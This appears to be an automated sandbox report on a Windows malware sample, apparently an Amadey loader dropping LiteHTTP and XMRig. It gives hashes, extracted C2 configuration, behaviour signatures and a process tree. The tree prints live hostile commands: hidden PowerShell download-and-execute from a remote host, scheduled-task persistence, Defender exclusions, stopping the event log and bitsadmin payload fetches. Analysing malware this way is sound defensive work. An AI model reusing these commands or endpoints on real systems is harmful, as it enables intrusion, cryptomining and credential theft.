Analysis
-
max time kernel
130s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
-
submitted
05/03/2025, 17:53
General
-
Target
74bfc29b66a4eda0105472ff8fa26eff959c4f60e9ee36d4ec32c43ee7f85d8d.exe
-
Size
938KB
-
MD5
f05c426533feda04db6bff6509118219
-
SHA1
1d14d9f5090f9823f8bcf5f11815ab96fe5ac448
-
SHA256
74bfc29b66a4eda0105472ff8fa26eff959c4f60e9ee36d4ec32c43ee7f85d8d
-
SHA512
5f3d0c65ae241842ee84bedc24ef29e06961206c1c6757a1a9d7e52a826f350aca04c1e0f91780e5c084cd91a2757f0a80f064c805c152005952619444383139
-
SSDEEP
24576:/qDEvCTbMWu7rQYlBQcBiT6rprG8a0pu:/TvC/MTQYxsWR7a0p
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
litehttp
v1.0.9
http://185.208.156.162/page.php
-
key
v1d6kd29g85cm8jp4pv8tvflvg303gbl
Signatures
-
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
-
Amadey family
-
LiteHTTP
LiteHTTP is an open-source bot written in C#.
-
Litehttp family
-
Xmrig family
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
-
XMRig Miner payload 11 IoCs
-
Blocklisted process makes network request 3 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs
Using powershell.exe command.
-
Creates new service(s) 2 TTPs
-
Download via BitsAdmin 1 TTPs 3 IoCs
-
Downloads MZ/PE file 9 IoCs
-
Stops running service(s) 4 TTPs
-
Checks BIOS information in registry 2 TTPs 12 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Executes dropped EXE 19 IoCs
-
Identifies Wine through registry keys 2 TTPs 6 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
-
Loads dropped DLL 52 IoCs
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
-
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
-
Drops file in System32 directory 4 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
-
Suspicious use of SetThreadContext 4 IoCs
-
UPX packed file 14 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Drops file in Windows directory 3 IoCs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 4 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 39 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Delays execution with timeout.exe 1 IoCs
-
Modifies Internet Explorer settings 1 TTPs 3 IoCs
-
Modifies data under HKEY_USERS 2 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: MapViewOfSection 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 19 IoCs
-
Suspicious use of FindShellTrayWindow 7 IoCs
-
Suspicious use of SendNotifyMessage 6 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\74bfc29b66a4eda0105472ff8fa26eff959c4f60e9ee36d4ec32c43ee7f85d8d.exe"C:\Users\Admin\AppData\Local\Temp\74bfc29b66a4eda0105472ff8fa26eff959c4f60e9ee36d4ec32c43ee7f85d8d.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn MXenbmaquu9 /tr "mshta C:\Users\Admin\AppData\Local\Temp\8y2tvYrNH.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn MXenbmaquu9 /tr "mshta C:\Users\Admin\AppData\Local\Temp\8y2tvYrNH.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\8y2tvYrNH.hta2⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'R1RODP7HUKOCBYBDKWURRGEXNPNJ197D.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\TempR1RODP7HUKOCBYBDKWURRGEXNPNJ197D.EXE"C:\Users\Admin\AppData\Local\TempR1RODP7HUKOCBYBDKWURRGEXNPNJ197D.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\10104610101\e2489f69e3.exe"C:\Users\Admin\AppData\Local\Temp\10104610101\e2489f69e3.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn CedTXmaOI7z /tr "mshta C:\Users\Admin\AppData\Local\Temp\8g7oMximW.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn CedTXmaOI7z /tr "mshta C:\Users\Admin\AppData\Local\Temp\8g7oMximW.hta" /sc minute /mo 25 /ru "Admin" /f8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\8g7oMximW.hta7⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LVHRO92FETIHRM6MYOYIN83LFR9BMUEH.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\TempLVHRO92FETIHRM6MYOYIN83LFR9BMUEH.EXE"C:\Users\Admin\AppData\Local\TempLVHRO92FETIHRM6MYOYIN83LFR9BMUEH.EXE"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\10104620121\am_no.cmd" "6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\timeout.exetimeout /t 27⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "5A2z7maBhPd" /tr "mshta \"C:\Temp\MdtOLSGwR.hta\"" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\MdtOLSGwR.hta"7⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe"C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\9wvMkiFG\Anubis.exe""7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\AppData\Local\Temp\10105180101\v6Oqdnc.exe"C:\Users\Admin\AppData\Local\Temp\10105180101\v6Oqdnc.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2732 -s 12087⤵
- Loads dropped DLL
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\10105190101\OEHBOHk.exe"C:\Users\Admin\AppData\Local\Temp\10105190101\OEHBOHk.exe"6⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart7⤵
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart8⤵
- Drops file in Windows directory
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 07⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 07⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 07⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 07⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "DWENDQPG"7⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "DWENDQPG" binpath= "C:\ProgramData\ztlktuiiawkf\ckonftponqgz.exe" start= "auto"7⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog7⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "DWENDQPG"7⤵
- Launches sc.exe
-
-
-
C:\Users\Admin\AppData\Local\Temp\10105200101\MCxU5Fj.exe"C:\Users\Admin\AppData\Local\Temp\10105200101\MCxU5Fj.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\10105200101\MCxU5Fj.exe"C:\Users\Admin\AppData\Local\Temp\10105200101\MCxU5Fj.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2968 -s 10368⤵
- Loads dropped DLL
- Program crash
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2400 -s 5007⤵
- Loads dropped DLL
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\10105210101\Y87Oyyz.exe"C:\Users\Admin\AppData\Local\Temp\10105210101\Y87Oyyz.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
C:\Windows\Temp\{1A32605E-7342-4E0A-B065-00A60EA19468}\.cr\Y87Oyyz.exe"C:\Windows\Temp\{1A32605E-7342-4E0A-B065-00A60EA19468}\.cr\Y87Oyyz.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\10105210101\Y87Oyyz.exe" -burn.filehandle.attached=180 -burn.filehandle.self=1887⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
C:\Windows\Temp\{CE02DBDD-39EE-4A89-9F8A-FE013349BB36}\.ba\SplashWin.exeC:\Windows\Temp\{CE02DBDD-39EE-4A89-9F8A-FE013349BB36}\.ba\SplashWin.exe8⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\osd_patch_beta\SplashWin.exeC:\Users\Admin\AppData\Roaming\osd_patch_beta\SplashWin.exe9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe10⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\Syncsign_v1.exeC:\Users\Admin\AppData\Local\Temp\Syncsign_v1.exe11⤵
- Loads dropped DLL
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10105221121\fCsM05d.cmd"6⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\fltMC.exefltmc7⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /transfer "DownloadVrep" https://authenticatior.com/vrep.msi "C:\Users\Admin\AppData\Local\Temp\vrep_install\vrep.msi"7⤵
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /transfer "DownloadClient" https://authenticatior.com/Client32.ini "C:\Users\Admin\AppData\Local\Temp\vrep_install\Client32.ini"7⤵
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /transfer "DownloadLicense" https://authenticatior.com/NSM.lic "C:\Users\Admin\AppData\Local\Temp\vrep_install\NSM.lic"7⤵
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
-
-
-
C:\Users\Admin\AppData\Local\Temp\10105230101\zY9sqWs.exe"C:\Users\Admin\AppData\Local\Temp\10105230101\zY9sqWs.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2132 -s 10407⤵
- Loads dropped DLL
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\10105240101\Ps7WqSx.exe"C:\Users\Admin\AppData\Local\Temp\10105240101\Ps7WqSx.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\10105250101\FvbuInU.exe"C:\Users\Admin\AppData\Local\Temp\10105250101\FvbuInU.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
-
-
-
-
-
-
C:\ProgramData\ztlktuiiawkf\ckonftponqgz.exeC:\ProgramData\ztlktuiiawkf\ckonftponqgz.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵
- Drops file in Windows directory
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵
-
-
C:\Windows\explorer.exeexplorer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
2Service Execution
2Persistence
BITS Jobs
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Power Settings
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Defense Evasion
BITS Jobs
1Impair Defenses
1Modify Registry
2Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
2Credentials In Files
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
779B
MD539c8cd50176057af3728802964f92d49
SHA168fc10a10997d7ad00142fc0de393fe3500c8017
SHA256f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84
SHA512cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6
-
Filesize
71KB
MD583142242e97b8953c386f988aa694e4a
SHA1833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10
-
Filesize
938KB
MD5c22f10f8d3bf4ff0453328c6a216e1ae
SHA18cb1fd2f3bc806eb3fd20015b2306ec2b4d1cafe
SHA2563994257b564e4b92bba726f86015fe74e1bb69af314cf24190cc468b6bfd927d
SHA512b9c961ebfc0c3ffc212e75775f301dafe67d158a586efa084faf8817b789218196997f7ba7b5b0a99b8a78e509584764e55e73f9117b304f8caf7a63575b6214
-
Filesize
1KB
MD5cedac8d9ac1fbd8d4cfc76ebe20d37f9
SHA1b0db8b540841091f32a91fd8b7abcd81d9632802
SHA2565e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b
SHA512ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5
-
Filesize
48KB
MD5d39df45e0030e02f7e5035386244a523
SHA19ae72545a0b6004cdab34f56031dc1c8aa146cc9
SHA256df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2
SHA51269866ba5b53d1183a0899e3d22ff06111ae2e8df429beeb853c89f3ed0afb015dd4139b1c507566ffb0fe171a4ff1b318247b7a568dc492d9f71266f5c848a64
-
Filesize
2.0MB
MD56006ae409307acc35ca6d0926b0f8685
SHA1abd6c5a44730270ae9f2fce698c0f5d2594eac2f
SHA256a5fa1579a8c1a1d4e89221619d037b6f8275f34546ed44a020f5dfcee3710f0b
SHA512b2c47b02c972f63915e2e45bb83814c7706b392f55ad6144edb354c7ee309768a38528af7fa7aeadb5b05638c0fd55faa734212d3a657cd08b7500838135e718
-
Filesize
5.0MB
MD5ddab071e77da2ca4467af043578d080c
SHA1226518a5064c147323482ac8db8479efd4c074f8
SHA256d3271bc7c315bd03e070cc2048c0349a73ecd858df500f2a2e2f09d606dfe79c
SHA512e3dc210bef348b324c9a00e32648b50a6cd0f078eefa436b201afd10853b648654de3fd993a1cea9d1aa4e7dde6587de1c1f8c09e09af7c62dde8536fd43d6d8
-
Filesize
415KB
MD5641525fe17d5e9d483988eff400ad129
SHA18104fa08cfcc9066df3d16bfa1ebe119668c9097
SHA2567a87b801af709e8e510140f0f9523057793e7883ec2b6a4eab90fcf0ec20fd4a
SHA512ee92bc34e21bb68aeda20b237e8b8e27f95e4cc44f5fd9743b52079c40f193cc342f8bb2690fd7ab3624e1690979118bd2e00a46bda3052cbd76bc379b87407e
-
Filesize
5.7MB
MD55fb40d81dac830b3958703aa33953f4f
SHA18f4689497df5c88683299182b8b888046f38c86a
SHA256b2395af2b5497ded848bfffc2192747510420b0a7bab9897322aed765c66d9dc
SHA51280b400bb79c4cbed1fb35af0fae1b88b399d679f7c99c625214082d143f51d381436abb27284b0205bdacf38cafa742a32c46ce8136ad7684d566d2e19bfab8e
-
Filesize
1KB
MD59e4466ae223671f3afda11c6c1e107d1
SHA1438b65cb77e77a41e48cdb16dc3dee191c2729c7
SHA256ab289a1dc9ad423e385c539a539feec8c04604d17656c663e52e02ceebd4409f
SHA5123f7be864e567e1906f9227fe4b8e47a9f16032d732aecfc7256e581939e3b810bc6e696c4a80be670624e5fd08c336d539e23ed825bd823614a2fcda3b21f2aa
-
Filesize
361KB
MD52bb133c52b30e2b6b3608fdc5e7d7a22
SHA1fcb19512b31d9ece1bbe637fe18f8caf257f0a00
SHA256b8e02f2bc0ffb42e8cf28e37a26d8d825f639079bf6d948f8debab6440ee5630
SHA51273229885f8bf4aace4671b819a8487f36acb7878cd309bdf80b998b0a63584f3063364d192b1fc26fa71b9664908fe290a00f6898350c30f40d5f2a2d2efe51f
-
Filesize
6.8MB
MD5dab2bc3868e73dd0aab2a5b4853d9583
SHA13dadfc676570fc26fc2406d948f7a6d4834a6e2c
SHA256388bd0f4fe9fca2897b29caac38e869905fd7d43c1512ca3fb9b772fbf2584eb
SHA5123aefebe985050dbbd196e20e7783ada4c74a57fb167040323390c35a5c7b0185cb865591bf77096ff2bb5269c4faa62c70f6c18fc633851efa3c7f8eefe1ceb8
-
Filesize
1.8MB
MD59dadf2f796cd4500647ab74f072fd519
SHA192b6c95a6ed1e120488bd28ac74274e874f6e740
SHA256e5f73330a51f34981205988aa6bbd82797a8d2d1e2ef1a605aa90baa3a806d76
SHA512fd9f14321805f6bfef8fa2c81e11c5c96a7246acbc70fb9c86e6a59d9e650353231ddca0c30d3c0db69cbee1c219c5ca416a6f9f691edeebbec114e997fc574d
-
Filesize
717B
MD5c6a4f85d7e0c6900ffda55964b1676a4
SHA1a5c4532e25564290564b186cd0357a21cf7dde24
SHA256f13fa816ecf18bbf68a340863a8c93c9991c9a92f5680410634066c7e75b4b03
SHA51283484fb1e3971e176b7c5c5845fb4adfe612ca0b14efd03057f150f1175364630cbd25bb70b19a9851dba9c8ec1e9e1e029c8a17d491ca1cef6eb2eb35498342
-
Filesize
717B
MD5285f8a133d872722923975e961cdcd23
SHA1a5f3ed4e858ac12aad8f209e081095f9fad1d097
SHA25699cd5dc94772951178006e21d12f798c2213dd6bb0fb315f729c4ab284a91a47
SHA512aa9f3636b7a4ddc1f7093944deda3cbdbe1c18d87dd998506c3415dac94ecf6c754ab87035d51b8f33dfb8afa006c12fbf1831bf3387d8fab071bb9b7cd8881d
-
Filesize
183KB
MD5109cab5505f5e065b63d01361467a83b
SHA14ed78955b9272a9ed689b51bf2bf4a86a25e53fc
SHA256ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673
